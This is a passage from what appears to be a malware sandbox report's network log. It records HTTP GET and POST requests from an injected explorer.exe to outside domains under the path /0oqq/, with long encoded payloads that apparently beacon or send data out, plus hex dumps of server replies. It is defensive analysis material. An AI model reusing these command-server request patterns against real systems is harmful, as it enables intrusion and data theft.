JOqGVaV1Gvo9gapWov1XuAfU7eU0JXrCRBJDaQL8segjFz8GlNMXaE8WzkR2-L4Cc6MMBEz1wjazY0CZ3I5veqpnPU3laO4DtMXkNfEQpHRdqnx32yqcClD6KYEmfj5EDSXn-lF3Rv4U0RewXRgu6XSY80te4EwileUq5leWM~IY6urVGxRNzQdSzMJEpryKdtSUKcGoyhuP8PquIsMFG0Fn5hBfvsjs72-MuJGtLxmzBUCREbfFLaAuAWt5o~zCgJSKIelU4pg4ABMwffnOZPET3Sqswi-w9NkN-sMPzPNRd9_COSfSnjIPYlnDywnuPGgA4h_Hut0NYaeXkJaUwyl3IgpjhslXFcsCKKq9p28SgyptZeQFwoa~eDohTebMWMzRI
                                                                                                                      Mar 20, 2023 09:11:00.777687073 CET323INHTTP/1.1 404 Not Found
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Date: Mon, 20 Mar 2023 08:11:00 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Frame-Options: deny
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      33192.168.2.349732217.160.0.24980C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:03.615211964 CET324OUTGET /0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
                                                                                                                      Host: www.karlscurry.co.uk
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:11:03.644845963 CET325INHTTP/1.1 404 Not Found
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 1271
                                                                                                                      Connection: close
                                                                                                                      Date: Mon, 20 Mar 2023 08:11:03 GMT
                                                                                                                      Server: Apache
                                                                                                                      X-Frame-Options: deny
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/'
                                                                                                                      Mar 20, 2023 09:11:03.644927025 CET325INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 2f 70 61 72 6b 2e 6a 73 22 3e 27 0a 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      34192.168.2.349733199.59.243.22380C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:16.049506903 CET327OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.hudsonandbailey.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.hudsonandbailey.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.hudsonandbailey.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 78 6e 72 41 34 59 47 43 6f 46 43 74 33 4d 35 51 74 41 6c 63 76 76 75 62 6c 62 4a 4b 30 36 7a 74 33 71 33 7a 4e 34 36 72 7a 6d 38 55 68 49 34 6f 37 47 47 6c 49 31 6e 54 76 36 61 65 7a 52 6f 54 4d 69 47 52 58 69 36 6b 49 39 4a 6b 43 7a 6d 2d 35 4c 59 71 48 6d 4c 30 31 4f 64 35 6c 70 46 37 39 32 65 73 6a 43 59 6c 56 34 38 54 32 4c 4a 4c 77 6f 55 65 6d 6f 38 33 56 47 68 62 76 42 37 64 66 78 42 6b 54 76 65 42 6b 34 45 79 5a 4c 55 56 75 2d 78 6e 58 63 68 2d 39 45 4a 68 42 52 32 43 32 66 36 35 34 46 35 64 30 53 44 78 52 69 4e 38 58 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=xnrA4YGCoFCt3M5QtAlcvvublbJK06zt3q3zN46rzm8UhI4o7GGlI1nTv6aezRoTMiGRXi6kI9JkCzm-5LYqHmL01Od5lpF792esjCYlV48T2LJLwoUemo83VGhbvB7dfxBkTveBk4EyZLUVu-xnXch-9EJhBR2C2f654F5d0SDxRiN8XQ).
                                                                                                                      Mar 20, 2023 09:11:16.251960993 CET328INHTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Mon, 20 Mar 2023 08:11:16 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: parking_session=36b29617-edff-6f5d-f022-dd0db1c690f3; expires=Mon, 20-Mar-2023 08:26:16 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_f2cNXgE8cPdm72znqmDh5cq32UuZaCB1P1WZz7bITNCoTvYoRvbxgDuh2OUM3jdke912kvHZsHYuwnEmVjasmw==
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 33 37 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 9d 54 c9 92 a3 38 10 fd 15 8f 2f 7d 99 b2 59 9a 5a 7a 8c 23 b0 01 1b 0a 70 b1 1b 2e 13 42 92 8d 40 2c 05 18 0c 5f 3f 94 bb a3 e7 36 87 b9 28 42 ca cc 97 99 2f 5f 6a f3 07 aa 60 37 d6 78 91 76 05 dd 6e be ce 05 02 1d 78 02 28 a1 15 cc 73 3c 8a 4b 53 1d 06 d9 8e f4 f7 2a d6 d2 1e 5a 92 ad ec 76 b6 24 bb 83 34 b8 92 be 93 2c b9 a9 39 3a bd 48 a7 42 92 81 f5 da 49 02 63 b4 21 cc 0c 75 b4 55 98 ac 3f 38 ef 0e 85 d7 2a 3a 61 cd 48 f8 7e 37 bc e8 cf 97 ef 35 28 72 c9 0e 5c fb f6 19 b5 ef 77 3e 9a 90 7f dc f7 49 10 f7 aa df ee a5 41 91 24 5b 14 ff be 70 d0 3a 5f 95 57 f8 81 8a 17 6e 2a 3f 0b 39 15 e0 27 cf f9 b7 18 ec 77 ec 07 1b c6 d3 4b a2 79 d6 be f2 fa a8 72 fa e4 7e 95 6f 29 77 f2 4d 3e 43 39 7e 63 b9 bc 3f c6 ed 31 ba 0d a5 52 04 19 68 8b 41 14 97 73 c7 18 a0 ed a6 c0 1d 58 c0 14 34 2d ee c4 e5 ad bb 3c bd ce b6 c7 6b 09 0a 2c 2e 7b 82 87 ba 6a ba e5 02 56 65 87 cb d9 6b 20 a8 4b 45 84 7b 02 f1 d3 e3 f2 e7 82 94 a4 23 80 3e b5 10 50 2c b2 33 06 25 65 be 68 30 15 97 75 83 e7 d8 12 c3 19 24 6d f0 45 5c a6 5d 57 b7 3f d6 eb
                                                                                                                      Data Ascii: 37cT8/}YZz#p.B@,_?6(B/_j`7xvnx(s<KS*Zv$4,9:HBIc!uU?8*:aH~75(r\w>IA$[p:_Wn*?9'wKyr~o)wM>C9~c?1RhAsX4-<k,.{jVek KE{#>P,3%eh0u$mE\]W?
                                                                                                                      Mar 20, 2023 09:11:16.252011061 CET329INData Raw: 61 18 56 d7 aa ba 52 bc 82 55 31 a7 68 aa b6 ad 1a 72 25 e5 76 b3 fe 59 61 52 a1 71 bb 41 a4 5f 10 24 2e 3b d0 5c f1 8c d3 76 e3 9c e7 5b 55 03 48 ba f1 c7 82 f9 36 07 cc 4e db 4d 0b 1b 52 77 db 81 94 a8 1a 56 35 68 f2 85 b8 58 e2 51 67 51 48 73
                                                                                                                      Data Ascii: aVRU1hr%vYaRqA_$.;\v[UH6NMRwV5hXQgQHs-9r`N 7h03{4Ey&2t[f$CC"z1kZ2(=oFB3%&C9YZKc.$aV_y6Xw=6Am


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      35192.168.2.349734199.59.243.22380C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:11:18.600904942 CET335OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.hudsonandbailey.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.hudsonandbailey.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.hudsonandbailey.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 78 6e 72 41 34 59 47 43 6f 46 43 74 33 74 70 51 72 6a 39 63 28 5f 75 45 71 37 4a 4b 74 4b 7a 70 33 71 37 7a 4e 38 6a 6d 7a 77 45 55 6d 5a 6f 6f 34 6a 71 6c 4b 31 6e 54 74 36 61 53 38 78 6f 42 4d 6a 69 6e 58 6e 47 53 49 5f 6c 6b 41 67 65 2d 76 62 59 74 4c 6d 4c 78 32 4f 64 36 34 35 46 37 39 32 6a 44 6a 44 59 50 56 35 55 54 33 2d 64 4c 77 74 34 64 6e 34 38 32 58 47 68 62 76 42 33 57 66 78 42 53 54 72 4b 52 6b 34 6b 79 59 64 59 56 69 4e 70 6f 44 38 68 35 31 6b 4a 5f 46 53 6e 39 69 64 7e 50 34 55 6c 55 37 33 4f 2d 55 79 41 62 4d 37 75 67 44 69 36 4d 44 58 42 64 77 64 49 69 7e 66 44 53 50 30 51 4f 5a 4a 6e 2d 39 52 44 66 41 52 28 45 6f 36 7e 65 56 7a 4f 58 64 53 49 74 36 61 4b 31 55 70 6c 59 49 4e 39 69 35 48 78 6a 6f 77 30 79 45 4a 36 51 66 6d 37 64 42 63 28 44 39 79 4c 41 6a 6a 48 62 79 76 5a 31 33 71 47 55 4e 5a 51 6b 6c 69 4d 30 66 48 5a 44 66 48 57 35 41 33 46 57 45 6d 35 35 69 31 41 71 36 39 5a 4b 41 4c 51 56 45 68 74 7a 34 34 6c 4a 6d 4a 47 41 63 58 74 5a 33 65 7e 58 41 53 53 2d 74 2d 69 4a 55 77 41 4e 49 42 4e 64 43 6e 58 6c 7e 75 66 76 4b 48 28 70 73 66 55 35 55 4d 49 53 64 77 56 4b 65 76 69 31 42 59 36 71 47 57 30 75 70 35 70 79 44 31 50 58 65 41 39 51 49 46 49 72 31 62 64 76 78 41 4f 65 4d 70 6a 78 4f 38 50 46 52 4e 48 43 73 53 56 49 68 59 6c 76 54 70 50 33 67 69 31 34 30 50 6f 4b 51 5f 32 45 68 61 4a 5f 75 31 4b 6e 7a 36 47 5a 4b 6c 58 6b 68 49 67 43 30 73 79 64 49 2d 55 31 72 71 28 59 4a 55 72 2d 44 2d 67 64 32 57 43 59 32 75 4b 35 5a 46 4e 68 31 7a 69 4b 55 50 38 59 53 39 77 30 58 39 4c 68 28 44 74 56 49 43 6a 5a 35 39 4f 55 59 31 79 34 45 2d 43 34 76 53 6e 42 58 47 4b 59 56 66 6c 4f 47 56 63 5a 38 77 6d 7a 69 65 43 38 52 59 33 44 4f 59 73 45 67 49 64 37 4a 55 37 46 30 65 47 42 47 70 58 32 42 43 6d 52 64 56 67 67 4c 65 52 33 44 31 78 36 38 45 61 6b 45 57 32 45 6a 4a 34 31 38 5a 49 5f 79 57 46 55 61 6a 33 34 30 6c 6f 6d 79 58 47 66 4e 4d 51 31 47 72 42 30 50 46 7a 62 76 4d 7e 4a 54 6e 33 50 4c 42 34 55 31 4d 77 6f 6f 2d 74 6e 7a 75 58 30 55 6d 53 6f 38 7a 53 71 4a 4b 51 4f 31 56 28 63 70 59 61 56 6c 66 75 45 47 36 76 70 56 56 35 30 48 54 4e 46 4d 38 4b 50 45 38 38 6d 35 71 62 66 69 36 68 73 54 64 46 35 68 66 68 50 32 57 45 68 65 4d 65 5f 64 62 64 62 7a 64 54 74 75 5a 64 72 39 4b 7a 4b 66 35 34 37 54 75 32 6f 77 55 47 6d 31 48 6a 42 77 49 49 32 48 58 30 55 30 68 51 70 64 64 42 6a 77 50 48 33 6a 76 28 74 44 5a 50 52 65 71 72 4c 7e 38 77 62 63 51 58 63 33 4e 48 65 69 45 6e 64 68 76 4b 77 5a 4f 79 77 34 70 73 36 4c 69 51 45 31 79 56 46 4d 61 59 76 76 6b 49 64 35 6e 55 51 32 5a 7a 6e 57 36 6d 42 42 6d 71 31 4e 33 32 75 37 59 34 4c 39 52 33 30 4f 42 35 76 72 6e 45 70 48 6a 57 56 48 4d 56 61 50 54 44 5a 61 4e 39 7a 66 39 32 76 41 48 36 66 4b 7a 69 6e 73 77 47 7a 64 71 62 33 64 6c 65 64 47 31 56 78 31 74 52 37 53 5f 74 71 51 6b 38 79 57 63 73 4f 7a 6c 79 79 69 34 6a 47 6f 46 57 74 47 64 71 55 74 5f 70 73 50 48 75 52 57 49 47 35 6c 58 30 57 43 70 50 7a 73 62 68 54 7e 6f 6c 6a 7a 67 76 5f 5a 71 74 61 73 57 46 48 74 59 52 57 78 5a 78 6e 6c 5f 57 30 71 67 79 72 4a 61 76 5f 6f 57 49 71 43 41 41 61 61 35 4e 62 48 59 4a 71 4b 72 6e 79 49 79 68 36 54 49 34 71 69 51 64 6b 6b 6c 71 71 59 52 74 73 6a 61 6e 65 45 6b 7e 52 78 75 4e 78 72 64 31 38 6d 45 68 55 67 65 78 35 47 33 43 57 4d 66 63 45 34 37 51 7a 52 33 63 6b 71 78 6a 36 69 6f 41 62 68 6b 31 6a 31 62 74 55 66 61 7e 78 64 33 57 35 66 51 69 34 59 53 68 4d 76 34 6c 57 63 76 31 2d 28 42 4d 41 79 64 69 6e 66 6a 28 5f 46 55 69 70 4b 69 6b 44 36 72 70 6c 56 38 36 67 64 74 31 4e 45 70 46 65 75 72 57 31 43 30 39 62 6f 35 67 66 6f 54 53 51 30 62 4f 37 4b 6a 71 72 45 5a 75 73 6e 30 4d 71 55 65 76 65 30 31 70 36 79 78 78 43 75 4f 72 33 74 65 73 74 30 5a 41 69 71 4d 44 5a 70 6b 59 65 66 45 72 30 46 5f 30 75 77 46 6b 74 66 63 76 4d 79 44 48 5f 4e 33 5a 67 37 53 6a 64 7a 69 75 6d 31 75 52 51 65 46 78 63 4d 76 78 49 39 31 77 69 51 73 45 5f 76 63 6b 61 66 44 31 67 43 75 42 36 69 49 44 66 50 51 5a 7a 54 7a 55 43 61 48 30 49 58 58 39 53 64 6b 4f 58 4b 71 68 42 4d 4d 59 61 76 49 56 79 54 5a 71 5a 6e 4d 55 68 65 54 6f 78 30 65 59 4b 71 54 39 44 4c 47 6a 4a 75 6f 47
                                                                                                                      Data Ascii: ICHyvj5=xnrA4YGCoFCt3tpQrj9c(_uEq7JKtKzp3q7zN8jmzwEUmZoo4jqlK1nTt6aS8xoBMjinXnGSI_lkAge-vbYtLmLx2Od645F792jDjDYPV5UT3-dLwt4dn482XGhbvB3WfxBSTrKRk4kyYdYViNpoD8h51kJ_FSn9id~P4UlU73O-UyAbM7ugDi6MDXBdwdIi~fDSP0QOZJn-9RDfAR(Eo6~eVzOXdSIt6aK1UplYIN9i5Hxjow0yEJ6Qfm7dBc(D9yLAjjHbyvZ13qGUNZQkliM0fHZDfHW5A3FWEm55i1Aq69ZKALQVEhtz44lJmJGAcXtZ3e~XASS-t-iJUwANIBNdCnXl~ufvKH(psfU5UMISdwVKevi1BY6qGW0up5pyD1PXeA9QIFIr1bdvxAOeMpjxO8PFRNHCsSVIhYlvTpP3gi140PoKQ_2EhaJ_u1Knz6GZKlXkhIgC0sydI-U1rq(YJUr-D-gd2WCY2uK5ZFNh1ziKUP8YS9w0X9Lh(DtVICjZ59OUY1y4E-C4vSnBXGKYVflOGVcZ8wmzieC8RY3DOYsEgId7JU7F0eGBGpX2BCmRdVggLeR3D1x68EakEW2EjJ418ZI_yWFUaj340lomyXGfNMQ1GrB0PFzbvM~JTn3PLB4U1Mwoo-tnzuX0UmSo8zSqJKQO1V(cpYaVlfuEG6vpVV50HTNFM8KPE88m5qbfi6hsTdF5hfhP2WEheMe_dbdbzdTtuZdr9KzKf547Tu2owUGm1HjBwII2HX0U0hQpddBjwPH3jv(tDZPReqrL~8wbcQXc3NHeiEndhvKwZOyw4ps6LiQE1yVFMaYvvkId5nUQ2ZznW6mBBmq1N32u7Y4L9R30OB5vrnEpHjWVHMVaPTDZaN9zf92vAH6fKzinswGzdqb3dledG1Vx1tR7S_tqQk8yWcsOzlyyi4jGoFWtGdqUt_psPHuRWIG5lX0WCpPzsbhT~oljzgv_ZqtasWFHtYRWxZxnl_W0qgyrJav_oWIqCAAaa5NbHYJqKrnyIyh6TI4qiQdkklqqYRtsjaneEk~RxuNxrd18mEhUgex5G3CWMfcE47QzR3ckqxj6ioAbhk1j1btUfa~xd3W5fQi4YShMv4lWcv1-(BMAydinfj(_FUipKikD6rplV86gdt1NEpFeurW1C09bo5gfoTSQ0bO7KjqrEZusn0MqUeve01p6yxxCuOr3test0ZAiqMDZpkYefEr0F_0uwFktfcvMyDH_N3Zg7Sjdzium1uRQeFxcMvxI91wiQsE_vckafD1gCuB6iIDfPQZzTzUCaH0IXX9SdkOXKqhBMMYavIVyTZqZnMUheTox0eYKqT9DLGjJuoGq4qERgVjFFYgwEW5DG9gV3uaGQLIps1hKF2AWrY53aEGRzKrdV91DQMt0x6rSmT7I~ZLCnM9DrEht2FVEPy8W31yqsFUo7lx5ueGZ7dpVwIZZBF3UWlBwMNe_Ebwk~OhR2muol_jZ7uSBDF3p7BQLPeq0bTh81CLSudjFR1EXsT0aqqyvqQvlKSz-W83I~1YelXjxGQ2pchoPZzhezYBUcwc_I-2Pvs9z37jgsW00UtOThxgjkLF5m5zo0uTBIQ38iohO~wa-n6rDHG5_xeUjztRYdpLnVNwB4a6xa5snURbvQurVq6ZKaz1D7jMzYbe16426dLfx4BbXWOi7zDYz9Q36~E6FWgVmAA3NaVtDysZsf3e7QNbsLccOg2FJJI2bFLCKOctWTlA3v_K72TD0LZLo9If8KxFyxf0vV9cicDXcyx0lL7Vd3JSlqWIhJ5uFBPMOmwJt53EQxDxCfuxsUVNgjrQm9mnaDDozAuYkHHPVNjxyX5OThw757RWjBbuSveLuMPf2WmG7FHU7(3rVBk0at4T3i2U2UjyKYIwU1TB0Df7S~zoOmFOYgtRYrrWPdi~RLfZkd5c4RS7XtIIEQr9NvM68pBvx9vxUyZZHKz1Vkvtpijvkp3eAhOg6IiMj6n9ZUQxKRnTMmjY4NNApIi(xjyMRR8RMmRckHZ~AJcS720BAi-IPsK0kwJGZp5tQjH83t8gnMqyF9ptc~QMhVFpRaQ5KTFBovLi4uTXmBRJxneiYb-pryHXsSLqP~1ot33d_Pp6A4Mq5tCN3mbetT73hm3TEVwKooPmMuds5V6Uv2SFoBGzoPQgpKuiAshbWMI5uHh(1ohCJMe6zI1rilAT57maUdArDk6YMs65kUIhOSDNeZvqpFEXrXHbwYQpDHPv8k_~xnj8OsSWfGD6uwm(pTgokjx2BMgtnJUn9fw9aNgOD1RH5ESqa6-D6LqC-9cHNeRr5U6z-oydGVx2sjiYvkA1AuwTILOcr(WsjncLLYcCTUeZUU6FSnGDSPOS8vVnEeRsbd8BDGTAWSSXvok1F8_RWiCqJn2VqL5msgcvNZtcDWCZrMBlQry8mvoJnWugiquNL8zERaVjC1we8QekIg5AKhBgxSOJSfhxgw1ny3igJNiPwEK0iVUKzZ7eFhm